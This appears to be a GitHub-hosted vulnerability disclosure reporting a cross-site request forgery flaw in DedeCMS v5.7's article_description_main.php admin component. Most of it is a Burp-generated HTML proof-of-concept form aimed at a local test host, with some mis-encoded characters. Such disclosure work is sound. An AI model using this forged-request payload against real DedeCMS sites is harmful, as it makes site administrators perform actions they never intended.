target:https://github.com/wdsunwq/DedeCMSv5 version: v5.7

DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /dede/article_description_main.php

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/src/dede/article_description_main.php" method="POST">
      <input type="hidden" name="channel" value="1" />
      <input type="hidden" name="dsize" value="240" />
      <input type="hidden" name="table" value="dede&#95;addonarticle" />
      <input type="hidden" name="field" value="body" />
      <input type="hidden" name="msize" value="512" />
      <input type="hidden" name="pagesize" value="100" />
      <input type="hidden" name="sid" value="" />
      <input type="hidden" name="eid" value="" />
      <input type="hidden" name="dojob" value="des" />
      <input type="hidden" name="Submit" value="�&#188;&#128;�&#167;&#139;�&#137;&#167;�&#161;&#140;�&#136;&#134;�&#158;&#144;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Successed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

15.md

15.md

Files

15.md

Latest commit

History

15.md

File metadata and controls